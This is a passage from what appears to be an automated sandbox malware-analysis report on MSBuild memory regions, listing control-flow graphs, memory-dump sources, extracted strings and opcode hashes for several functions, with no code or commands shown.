                          control_flow_graph 1213 2ae20e8-2ae2124 1215 2ae2139-2ae213e call 2ae18a8 1213->1215 1216 2ae2126-2ae2137 1213->1216 1218 2ae2143-2ae216b 1215->1218 1216->1218 1221 2ae296c-2ae2998 1218->1221 1222 2ae2171-2ae2185 1218->1222 1222->1221 1223 2ae218b-2ae2199 1222->1223 1223->1221 1224 2ae219f-2ae21b0 1223->1224 1224->1221 1226 2ae21b6-2ae21cb 1224->1226 1229 2ae21cd-2ae21e1 1226->1229 1230 2ae220a-2ae2210 1226->1230 1236 2ae21e3-2ae21fe 1229->1236 1237 2ae2200-2ae2208 1229->1237 1231 2ae2215-2ae2228 1230->1231 1232 2ae222a-2ae222f 1231->1232 1233 2ae2231 1231->1233 1235 2ae2236-2ae2241 1232->1235 1233->1235 1238 2ae224a-2ae2258 1235->1238 1239 2ae2243 1235->1239 1236->1231 1237->1231 1238->1221 1240 2ae225e-2ae2278 1238->1240 1239->1238 1240->1221 1242 2ae227e-2ae22a4 1240->1242 1244 2ae22a6-2ae22ae 1242->1244 1245 2ae22b0 1242->1245 1246 2ae22b8-2ae22d8 1244->1246 1245->1246 1250 2ae22da 1246->1250 1251 2ae22e3-2ae22ea 1246->1251 1250->1251 1252 2ae22ec-2ae22f0 1251->1252 1253 2ae22f2-2ae2314 call 2ae0bf8 call 2ae0b98 1251->1253 1252->1253 1254 2ae2316-2ae2325 1252->1254 1259 2ae232f-2ae2345 1253->1259 1254->1259 1260 2ae2327 1254->1260 1259->1221 1262 2ae234b-2ae236e 1259->1262 1260->1259 1262->1221 1263 2ae2374-2ae237f 1262->1263 1264 2ae2396-2ae2398 1263->1264 1265 2ae2381-2ae238f 1263->1265 1344 2ae239b call 2ae2def 1264->1344 1345 2ae239b call 2ae2ed8 1264->1345 1346 2ae239b call 2ae2e00 1264->1346 1265->1264 1266 2ae23a1-2ae23b7 1266->1221 1267 2ae23bd-2ae23e0 1266->1267 1267->1221 1268 2ae23e6-2ae23ee 1267->1268 1269 2ae23fa-2ae2401 1268->1269 1270 2ae23f0-2ae23f8 1268->1270 1271 2ae240c-2ae241d 1269->1271 1272 2ae2403-2ae240a 1269->1272 1275 2ae243c-2ae2443 1270->1275 1271->1221 1273 2ae2423-2ae2431 1271->1273 1272->1271 1272->1275 1273->1221 1276 2ae2437 1273->1276 1277 2ae244f-2ae2467 1275->1277 1278 2ae2445-2ae244d 1275->1278 1276->1275 1283 2ae2472 1277->1283 1279 2ae2478-2ae248e 1278->1279 1279->1221 1281 2ae2494-2ae24b6 1279->1281 1281->1221 1282 2ae24bc-2ae24de 1281->1282 1282->1221 1284 2ae24e4-2ae250f 1282->1284 1283->1279 1284->1221 1285 2ae2515-2ae2529 1284->1285 1285->1221 1286 2ae252f-2ae2551 1285->1286 1286->1221 1287 2ae2557-2ae2579 1286->1287 1287->1221 1288 2ae257f-2ae25aa 1287->1288 1288->1221 1289 2ae25b0-2ae25bb 1288->1289 1290 2ae25bd 1289->1290 1291 2ae25e0-2ae25f8 1289->1291 1292 2ae25bf-2ae25ca 1290->1292 1291->1221 1293 2ae25fe-2ae262e 1291->1293 1292->1221 1294 2ae25d0-2ae25d9 1292->1294 1293->1221 1295 2ae2634-2ae2664 1293->1295 1294->1292 1296 2ae25db 1294->1296 1295->1221 1297 2ae266a-2ae269a 1295->1297 1298 2ae2768-2ae2773 1296->1298 1297->1221 1299 2ae26a0-2ae26bc 1297->1299 1298->1221 1300 2ae2779-2ae2793 1298->1300 1299->1221 1301 2ae26c2-2ae26f2 1299->1301 1300->1221 1302 2ae2799-2ae27b3 1300->1302 1301->1221 1303 2ae26f8-2ae2728 1301->1303 1308 2ae27bd 1302->1308 1309 2ae27b5-2ae27bb 1302->1309 1303->1221 1304 2ae272e-2ae275e 1303->1304 1304->1221 1306 2ae2764 1304->1306 1306->1298 1310 2ae27bf-2ae27d0 1308->1310 1309->1310 1310->1221 1311 2ae27d6-2ae27f0 1310->1311 1311->1221 1312 2ae27f6-2ae284e 1311->1312 1316 2ae286d-2ae2887 1312->1316 1317 2ae2850-2ae286a 1312->1317 1320 2ae28d8-2ae28e5 1316->1320 1321 2ae2889-2ae28ad call 2ae18b8 call 2ae18c8 call 2ae0898 1316->1321 1317->1316 1325 2ae28ed-2ae28fe 1320->1325 1326 2ae28e7-2ae28eb 1320->1326 1337 2ae28bf-2ae28cc 1321->1337 1338 2ae28af-2ae28bd 1321->1338 1347 2ae2901 call 2ae309a 1325->1347 1348 2ae2901 call 2ae30a8 1325->1348 1326->1325 1328 2ae292b-2ae2961 1326->1328 1328->1221 1330 2ae2904-2ae2906 1333 2ae2908-2ae290e call 2ae18b8 1330->1333 1334 2ae2913-2ae2928 1330->1334 1333->1334 1341 2ae28cf-2ae28d2 1337->1341 1338->1341 1341->1320 1344->1266 1345->1266 1346->1266 1347->1330 1348->1330
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: .$K$c
                          • API String ID: 0-3458198900
                          • Opcode ID: f47513e097aa48aeaa49c1c6ad777c4113a0955e9828f071745c73004f0f0b44
                          • Instruction ID: 7d7465ee293cb1a26c643b36c9e7b64da072ff63ee07e9d48de5a03d8371c406
                          • Opcode Fuzzy Hash: f47513e097aa48aeaa49c1c6ad777c4113a0955e9828f071745c73004f0f0b44
                          • Instruction Fuzzy Hash: 24429031A006158FDB18CF68C8C4BA9FBB6BF55304F1485A9D85A9B356CB30AD92CF91
                          Function 02AE20D8 Relevance: 4.2, Strings: 3, Instructions: 419COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1607 2ae20d8-2ae2124 1610 2ae2139-2ae213e call 2ae18a8 1607->1610 1611 2ae2126-2ae2137 1607->1611 1613 2ae2143-2ae216b 1610->1613 1611->1613 1616 2ae296c-2ae2998 1613->1616 1617 2ae2171-2ae2185 1613->1617 1617->1616 1618 2ae218b-2ae2199 1617->1618 1618->1616 1619 2ae219f-2ae21b0 1618->1619 1619->1616 1621 2ae21b6-2ae21cb 1619->1621 1624 2ae21cd-2ae21e1 1621->1624 1625 2ae220a-2ae2210 1621->1625 1631 2ae21e3-2ae21fe 1624->1631 1632 2ae2200-2ae2208 1624->1632 1626 2ae2215-2ae2228 1625->1626 1627 2ae222a-2ae222f 1626->1627 1628 2ae2231 1626->1628 1630 2ae2236-2ae2241 1627->1630 1628->1630 1633 2ae224a-2ae2258 1630->1633 1634 2ae2243 1630->1634 1631->1626 1632->1626 1633->1616 1635 2ae225e-2ae2278 1633->1635 1634->1633 1635->1616 1637 2ae227e-2ae22a4 1635->1637 1639 2ae22a6-2ae22ae 1637->1639 1640 2ae22b0 1637->1640 1641 2ae22b8-2ae22d8 1639->1641 1640->1641 1645 2ae22da 1641->1645 1646 2ae22e3-2ae22ea 1641->1646 1645->1646 1647 2ae22ec-2ae22f0 1646->1647 1648 2ae22f2-2ae2314 call 2ae0bf8 call 2ae0b98 1646->1648 1647->1648 1649 2ae2316-2ae2325 1647->1649 1654 2ae232f-2ae2345 1648->1654 1649->1654 1655 2ae2327 1649->1655 1654->1616 1657 2ae234b-2ae236e 1654->1657 1655->1654 1657->1616 1658 2ae2374-2ae237f 1657->1658 1659 2ae2396-2ae2398 1658->1659 1660 2ae2381-2ae238f 1658->1660 1741 2ae239b call 2ae2def 1659->1741 1742 2ae239b call 2ae2ed8 1659->1742 1743 2ae239b call 2ae2e00 1659->1743 1660->1659 1661 2ae23a1-2ae23b7 1661->1616 1662 2ae23bd-2ae23e0 1661->1662 1662->1616 1663 2ae23e6-2ae23ee 1662->1663 1664 2ae23fa-2ae2401 1663->1664 1665 2ae23f0-2ae23f8 1663->1665 1666 2ae240c-2ae241d 1664->1666 1667 2ae2403-2ae240a 1664->1667 1670 2ae243c-2ae2443 1665->1670 1666->1616 1668 2ae2423-2ae2431 1666->1668 1667->1666 1667->1670 1668->1616 1671 2ae2437 1668->1671 1672 2ae244f-2ae2467 1670->1672 1673 2ae2445-2ae244d 1670->1673 1671->1670 1678 2ae2472 1672->1678 1674 2ae2478-2ae248e 1673->1674 1674->1616 1676 2ae2494-2ae24b6 1674->1676 1676->1616 1677 2ae24bc-2ae24de 1676->1677 1677->1616 1679 2ae24e4-2ae250f 1677->1679 1678->1674 1679->1616 1680 2ae2515-2ae2529 1679->1680 1680->1616 1681 2ae252f-2ae2551 1680->1681 1681->1616 1682 2ae2557-2ae2579 1681->1682 1682->1616 1683 2ae257f-2ae25aa 1682->1683 1683->1616 1684 2ae25b0-2ae25bb 1683->1684 1685 2ae25bd 1684->1685 1686 2ae25e0-2ae25f8 1684->1686 1687 2ae25bf-2ae25ca 1685->1687 1686->1616 1688 2ae25fe-2ae262e 1686->1688 1687->1616 1689 2ae25d0-2ae25d9 1687->1689 1688->1616 1690 2ae2634-2ae2664 1688->1690 1689->1687 1691 2ae25db 1689->1691 1690->1616 1692 2ae266a-2ae269a 1690->1692 1693 2ae2768-2ae2773 1691->1693 1692->1616 1694 2ae26a0-2ae26bc 1692->1694 1693->1616 1695 2ae2779-2ae2793 1693->1695 1694->1616 1696 2ae26c2-2ae26f2 1694->1696 1695->1616 1697 2ae2799-2ae27b3 1695->1697 1696->1616 1698 2ae26f8-2ae2728 1696->1698 1703 2ae27bd 1697->1703 1704 2ae27b5-2ae27bb 1697->1704 1698->1616 1699 2ae272e-2ae275e 1698->1699 1699->1616 1701 2ae2764 1699->1701 1701->1693 1705 2ae27bf-2ae27d0 1703->1705 1704->1705 1705->1616 1706 2ae27d6-2ae27f0 1705->1706 1706->1616 1707 2ae27f6-2ae284e 1706->1707 1711 2ae286d-2ae2887 1707->1711 1712 2ae2850-2ae286a 1707->1712 1715 2ae28d8-2ae28e5 1711->1715 1716 2ae2889-2ae28ad call 2ae18b8 call 2ae18c8 call 2ae0898 1711->1716 1712->1711 1720 2ae28ed-2ae28fe 1715->1720 1721 2ae28e7-2ae28eb 1715->1721 1732 2ae28bf-2ae28cc 1716->1732 1733 2ae28af-2ae28bd 1716->1733 1739 2ae2901 call 2ae309a 1720->1739 1740 2ae2901 call 2ae30a8 1720->1740 1721->1720 1723 2ae292b-2ae2961 1721->1723 1723->1616 1725 2ae2904-2ae2906 1728 2ae2908-2ae290e call 2ae18b8 1725->1728 1729 2ae2913-2ae2928 1725->1729 1728->1729 1736 2ae28cf-2ae28d2 1732->1736 1733->1736 1736->1715 1739->1725 1740->1725 1741->1661 1742->1661 1743->1661
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: .$K$c
                          • API String ID: 0-3458198900
                          • Opcode ID: 86f1999d60257365eae32efaf8a9d0f01c3dc89f108c53c81b58a6e6d9d33e45
                          • Instruction ID: 9779fde5542884501b5634e2970983a3850140c1225a323d7cef60d760acbda0
                          • Opcode Fuzzy Hash: 86f1999d60257365eae32efaf8a9d0f01c3dc89f108c53c81b58a6e6d9d33e45
                          • Instruction Fuzzy Hash: A802B030A006558FDB18CF68C8C4BBCFBF6BF55300F1495A9D95A9B256CB30A982CF91
                          Function 02AEB74E Relevance: 3.3, Strings: 2, Instructions: 799COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: .$Dqq
                          • API String ID: 0-365989988
                          • Opcode ID: 83837cd420c76312830af966b7cdb551f8213b72f27371cbc6053d2d1f080687
                          • Instruction ID: 1145c20da786a81f65bff57e982cb77faa118158c4858fb42726ed4c421191e6
                          • Opcode Fuzzy Hash: 83837cd420c76312830af966b7cdb551f8213b72f27371cbc6053d2d1f080687
                          • Instruction Fuzzy Hash: 5972A170A00255CBDF25CF29C9847EDBBB2BF85314F1495AAD84AAB395DB309D82CF50
                          Function 02AEBA38 Relevance: 3.3, Strings: 2, Instructions: 787COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: -$.
                          • API String ID: 0-3807043784
                          • Opcode ID: 31f4306addf89841b425b64d8f65d7dee232d1f16d908a3fb6612f952a2639a2
                          • Instruction ID: 96e7cf7cea31c560a6404ba54b32580bb4bc25b5676230b1806413d785eda7e0
                          • Opcode Fuzzy Hash: 31f4306addf89841b425b64d8f65d7dee232d1f16d908a3fb6612f952a2639a2
                          • Instruction Fuzzy Hash: 18725D709142698BCB25CF19CD807E9BBB2BB55310F1895E6D84EAB346DB309D82CF90
                          Function 05AA49E8 Relevance: 3.0, Strings: 2, Instructions: 549COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pljq$$jq
                          • API String ID: 0-1466860515
                          • Opcode ID: 0211dcc5a56c69442a0ff5c1639ef853121a8ec4544708d7731453fe20bf18dd
                          • Instruction ID: e14905fb7f108da63aa46039c2c108c992ef1b52fd5932018865e89b7f612f20
                          • Opcode Fuzzy Hash: 0211dcc5a56c69442a0ff5c1639ef853121a8ec4544708d7731453fe20bf18dd
                          • Instruction Fuzzy Hash: 0D221235B002058FDB14DF29C984E6ABBF6BF89710F1580A9E516DB3A5DB71EC41CBA0
                          Function 02AE6E58 Relevance: 2.1, Strings: 1, Instructions: 874COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 18eec670ceaf63c7f9c4626af9d90eedfb23d6b96ed7da6d094010873fa3a9fc
                          • Instruction ID: 114e0ee3a4a8945a034a6d73412054e03f0617c22494150ecfa54a7807d20d5e
                          • Opcode Fuzzy Hash: 18eec670ceaf63c7f9c4626af9d90eedfb23d6b96ed7da6d094010873fa3a9fc
                          • Instruction Fuzzy Hash: 70826930A00B52CFCB65CF69C984B6AF7F2FF44304F148A69D59A87651DB34E896CB80
                          Function 058F5D80 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: J Gf
                          • API String ID: 0-4131994634
                          • Opcode ID: b268bc4b32c97e1d47b0b0d2bbbf1f67c2808cd5b5f2a056a7873ff0c56e683c
                          • Instruction ID: 979af83d1ee15fa5c0584c9e1e325fb84d8d40359837f97327c028cd8f292462
                          • Opcode Fuzzy Hash: b268bc4b32c97e1d47b0b0d2bbbf1f67c2808cd5b5f2a056a7873ff0c56e683c
                          • Instruction Fuzzy Hash: 49813930A05209DFCB48EFA9E499BADB7F6FB48305F418069E516EB2A5EB345D44CF40
                          Function 058F5D90 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: J Gf
                          • API String ID: 0-4131994634
                          • Opcode ID: 2b0f7f60fb349055aed09cdc1213b71cfeed6b9fbdd8a4cab553ff11d5b26f6f
                          • Instruction ID: e15374037271dfd3a2ee7ad160d9cd97ab30fc6cea30d8c360a3d89eb0146f3f
                          • Opcode Fuzzy Hash: 2b0f7f60fb349055aed09cdc1213b71cfeed6b9fbdd8a4cab553ff11d5b26f6f
                          • Instruction Fuzzy Hash: DB813A70A05209DFDB48EFA9E498BADB7F6FB48305F418069E516EB2A5EB345D44CF00
                          Function 02AE9760 Relevance: 1.3, Instructions: 1283COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe006d66052dbc3585beda71e2151e68dc709b49af90e49810c9d65ec3e46ebf
                          • Instruction ID: 20d49cd3c280546b7d78329fe73c7fc5415093d7b1572c00c98370f34129ce71
                          • Opcode Fuzzy Hash: fe006d66052dbc3585beda71e2151e68dc709b49af90e49810c9d65ec3e46ebf
                          • Instruction Fuzzy Hash: D0C2DF70A042548FDB25CF28C984BA9BBF2AF45304F1981E9D49A9B356CB71ED86CF50
                          Function 02AE8F90 Relevance: .7, Instructions: 677COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 19aed9fd7755032957d427e867a86478e15fba23370e78108f7826ea8d3947e9
                          • Instruction ID: ca0d89db57bab0683b2109a1a36a9f052a8b32c7f88d8973d0f09ab36bf0a328
                          • Opcode Fuzzy Hash: 19aed9fd7755032957d427e867a86478e15fba23370e78108f7826ea8d3947e9
                          • Instruction Fuzzy Hash: 5842B331A007528FCB25CF69C884AABFBF6FF85310B1585AAD546DB252DB31EC42CB51
                          Function 02AE4D98 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3511033488403a7cb77ef0c9e97653ad96bd5ad4410eb9f840be5ac9fd1ccbe8
                          • Instruction ID: 841b3300002d7f04200ee09f09e831b0ecc13ac6c02b63a279a8e960576ea32a
                          • Opcode Fuzzy Hash: 3511033488403a7cb77ef0c9e97653ad96bd5ad4410eb9f840be5ac9fd1ccbe8
                          • Instruction Fuzzy Hash: 7AC1BD30A007158FCB28DF69C58066EBBF6FF88310F648A2DD5568B790DB35E946CB91
                          Function 058FA108 Relevance: .2, Instructions: 228COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff2e49510e1b6ebb9d6a4f1d429e1124d1469f634d51a4cefc2fa5c1cd0411c6
                          • Instruction ID: 80e5655b4edc0d221d5477d5d60a198452ce0ec8ce669a8f50c5c575e3a1f75f
                          • Opcode Fuzzy Hash: ff2e49510e1b6ebb9d6a4f1d429e1124d1469f634d51a4cefc2fa5c1cd0411c6
                          • Instruction Fuzzy Hash: 27917030A08205CFEB18DB55E848BADB7F7BB8C325F558065D90AE7299E774AC80CB10
                          Function 058FA0F9 Relevance: .2, Instructions: 224COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f56087717fa151f00e0dde46011fb68ce8ad368278c90a46817e3a1596d24b43
                          • Instruction ID: bc56efa6cc3d46eceb1a469de63929268a2ef1db531b40af7004c33d3b685950
                          • Opcode Fuzzy Hash: f56087717fa151f00e0dde46011fb68ce8ad368278c90a46817e3a1596d24b43
                          • Instruction Fuzzy Hash: 2B919130A08205CFEB1CDB55E844BADB7F7BB8C325F558165D90AE7289D774AC81CB50
                          Function 058FA0CF Relevance: .2, Instructions: 223COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ab1f1d0b9ae37bec73144981b5fa8f25c06bfb54a8eb22dd77f7a990975eeed
                          • Instruction ID: 229bbdaa67fa9a0581e11e8c99ae986eff1697a026a47242f000bb79932a6aed
                          • Opcode Fuzzy Hash: 4ab1f1d0b9ae37bec73144981b5fa8f25c06bfb54a8eb22dd77f7a990975eeed
                          • Instruction Fuzzy Hash: 0791AF30A08205CFEB1CDB55E884BADB7F7BB88325F558065D90AE7289E734AC81CB50
                          Function 058FA3A9 Relevance: .2, Instructions: 207COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2de5c9486f4c546868b6c97ca5d2bb4bbdde0d517d7f4a404802d28a3cb20c46
                          • Instruction ID: eed052deb64829031e1f6e7fe08d378d1f5361d29a73c53148abe0e7f5a1a9c4
                          • Opcode Fuzzy Hash: 2de5c9486f4c546868b6c97ca5d2bb4bbdde0d517d7f4a404802d28a3cb20c46
                          • Instruction Fuzzy Hash: A0916030A08205CFEB18DF55E848BADB7F7BB8C325F558065D90AE7299D774AD80CB10
                          Function 058FA243 Relevance: .2, Instructions: 207COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 230f2270a330400156c17d74305f7205432bcc0aedf2f804b8d19ea6bcd76a40
                          • Instruction ID: e2ab271da3afa212610adb84a26e5e193a1a5e043c98c1ae458399b862e14004
                          • Opcode Fuzzy Hash: 230f2270a330400156c17d74305f7205432bcc0aedf2f804b8d19ea6bcd76a40
                          • Instruction Fuzzy Hash: C5916030A08205CFEB18DF55E848BADB7F7BB8C325F558065D90AE7299D774AD80CB10
                          Function 05AC8252 Relevance: .1, Instructions: 130COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f7b56d1a8f775edf2138032ff884ee9f6071cc1e63a4c1a2b1619386dc1e5ad
                          • Instruction ID: 7407183c1dfc6bd6e2d4249edf61f8b6b333c39758fa18dcb6d5f2eb103d6868
                          • Opcode Fuzzy Hash: 8f7b56d1a8f775edf2138032ff884ee9f6071cc1e63a4c1a2b1619386dc1e5ad
                          • Instruction Fuzzy Hash: 8B517334B09601CFE728DB29E058F7A7BE7BB88311F5581B9D4068B299DB799C41CB41
                          Function 05AA8FE0 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 787 5aa8fe0-5aa902c 791 5aa91aa-5aa91d9 787->791 792 5aa9032-5aa9044 787->792 805 5aa91db-5aa9216 791->805 806 5aa9184 791->806 795 5aa9046-5aa9092 792->795 796 5aa9094-5aa90dd 792->796 828 5aa90e0-5aa90f4 795->828 796->828 808 5aa921c-5aa9225 805->808 809 5aa9465-5aa946c 805->809 810 5aa9181 806->810 811 5aa9186-5aa9198 806->811 813 5aa929b-5aa92b4 808->813 814 5aa9227-5aa922b 808->814 810->811 823 5aa91a0-5aa91a7 811->823 829 5aa92ba 813->829 830 5aa93e1-5aa93f1 813->830 817 5aa922d-5aa9242 814->817 818 5aa9244-5aa9250 814->818 821 5aa9259-5aa9296 817->821 818->821 821->809 836 5aa90ff-5aa9120 828->836 831 5aa9309-5aa934c 829->831 832 5aa9399-5aa93dc 829->832 833 5aa92c1-5aa9304 829->833 834 5aa9351-5aa9394 829->834 838 5aa940a-5aa9416 830->838 839 5aa93f3-5aa9408 830->839 831->809 832->809 833->809 834->809 848 5aa912a-5aa9134 836->848 849 5aa9122-5aa9128 836->849 844 5aa941f-5aa9460 838->844 839->844 844->809 850 5aa9137-5aa917a 848->850 849->850 850->823 857 5aa917c 850->857 857->810
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$4'jq$4'jq$4'jq$4'jq$pnq
                          • API String ID: 0-2343140522
                          • Opcode ID: a400d6396dc172f70a0eb525fcb18870cf1cf894ce0646a571e94af5b87c8bca
                          • Instruction ID: e3e38261fb0c124284a98a82f12b9b5880796cb6609f1cc7ee2059f36db74831
                          • Opcode Fuzzy Hash: a400d6396dc172f70a0eb525fcb18870cf1cf894ce0646a571e94af5b87c8bca
                          • Instruction Fuzzy Hash: 2CD16036A00114DFCB09DF64C944EAABBB7FF88310F0544A8E609AB276D736ED55DB90
                          Function 05AC4DC0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1049 5ac4dc0-5ac4df9 1052 5ac4e6f-5ac4e94 1049->1052 1053 5ac4dfb-5ac4e07 1049->1053 1057 5ac4e9b-5ac4f00 1052->1057 1056 5ac4e0d-5ac4e23 1053->1056 1053->1057 1064 5ac4e25-5ac4e34 1056->1064 1065 5ac4e36-5ac4e52 1056->1065 1075 5ac4f28-5ac4f36 1057->1075 1076 5ac4f02-5ac4f04 1057->1076 1064->1065 1071 5ac4e5c 1065->1071 1072 5ac4e54-5ac4e5a 1065->1072 1074 5ac4e60-5ac4e6c 1071->1074 1072->1074 1083 5ac4f38-5ac4f46 1075->1083 1084 5ac4f6b-5ac4f76 1075->1084 1077 5ac4f0a-5ac4f0f 1076->1077 1078 5ac4fa3-5ac4fc8 1076->1078 1081 5ac4f19-5ac4f25 1077->1081 1082 5ac4f11-5ac4f13 1077->1082 1086 5ac4fcf-5ac4ff3 1078->1086 1082->1081 1082->1086 1092 5ac4f5c-5ac4f5e 1083->1092 1093 5ac4f48-5ac4f59 1083->1093 1094 5ac4f78-5ac4f9c 1084->1094 1095 5ac4f64-5ac4f68 1084->1095 1097 5ac4ffa-5ac504d 1086->1097 1092->1095 1092->1097 1094->1078 1108 5ac504f-5ac5065 1097->1108 1109 5ac50a8-5ac50fa 1097->1109 1114 5ac507d-5ac5095 1108->1114 1115 5ac5067-5ac506f 1108->1115 1123 5ac50fc-5ac5102 1109->1123 1124 5ac5112-5ac512a 1109->1124 1120 5ac5097 1114->1120 1121 5ac50a0-5ac50a5 1114->1121 1117 5ac5075-5ac507a 1115->1117 1120->1121 1125 5ac5104 1123->1125 1126 5ac5106-5ac5108 1123->1126 1125->1124 1126->1124
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$(nq$(nq$Hnq
                          • API String ID: 0-2034404110
                          • Opcode ID: b5b1540a6430294bbbcdb5c2376a5299f0ac682a493d872a4aa744eb77206265
                          • Instruction ID: 3af0ed324af35363a7de358e340287d2beca3f9771e27b2377613f3d878e5346
